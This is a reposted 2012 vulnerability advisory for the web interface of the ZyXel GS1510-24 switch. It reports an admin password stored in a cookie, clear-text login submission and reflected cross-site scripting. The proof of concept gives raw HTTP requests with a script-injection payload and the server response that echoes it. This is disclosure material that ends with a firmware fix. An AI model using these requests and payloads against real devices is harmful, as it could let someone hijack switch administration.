Home / exploits ZyXel GS1510 Cross Site Scripting
Posted on 14 March 2012
*Advisory Information* Title: Multiple vulnerabilities in ZyXel GS1510 web front end Date published: 2012-03-14 12:57:15 AM upSploit Ref: UPS-2011-0042 *Advisory Summary* IT Security Geeks have discovered multiple vulnerabilities in the ZyXel 1510 24-port Ethernet switch, these include Admin password stored in Cookie, reflected Cross-Site Scripting (XSS), and clear-text password submission. *Vendor* Zyxel *Affected Software* V1.00(BVN.1) This is the firmware that runs on the ZyXel model GS1510-24 switch. *Description of Issue* The GS1510-24 ZyXel switch, running firmware V1.00(BVN.1), is susceptible to multiple vulnerabilities, these are all within the management web interface, and are as follows: 1. The management web interface Cookie contains both the username and the password for the Admin user to log into the switch. 2. Cleartext submission of password. The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://192.168.1.5/webctrl.cgi The form contains the following password field: password 3. Cross Site Scripting The payload fe07b</title><script>alert(xss)</ script>b7e71e54af6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application’s response. *PoC* 2. Cleartext submission of password. http://192.168.1.5/webctrl.cgi Request GET /login.htm HTTP/1.1 Host: 192.168.1.5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cache-Control: max-age=0 SSSSSSS: UUUUUUUUUUUUUUUUUUUUUUUUUUUUUU Accept-Language: en-us Accept-Encoding: gzip, deflate Cookie: admin=password123 Pragma: no-cache Connection: keep-alive Proxy-Connection: keep-alive 3. Cross Site Scripting The payload fe07b</title><script>alert(1)</ script>b7e71e54af6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application’s response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application’s response. Request GET /images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1 HTTP/1.1 Host: 192.168.1.5 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: admin=password123 Response HTTP/1.1 200 OK Server: thttpd/2.25b 29dec2003 Content-Type: text/html; charset=iso-8859-1 Date: Sun, 18 Sep 2011 16:30:14 GMT Last-Modified: Sat, 01 Jan 2000 00:00:03 GMT Accept-Ranges: bytes Connection: close <HTML> <HEAD><TITLE>Index of /images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1</TITLE></HEAD> <BODY BGCOLOR="#99cc99" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>Index of /images/?fe ...[SNIP]... *Credits* Neil Fryer/IT Security Geeks *References* ZyXel GS1510 *Patch/Fix* Update to the latest firmware
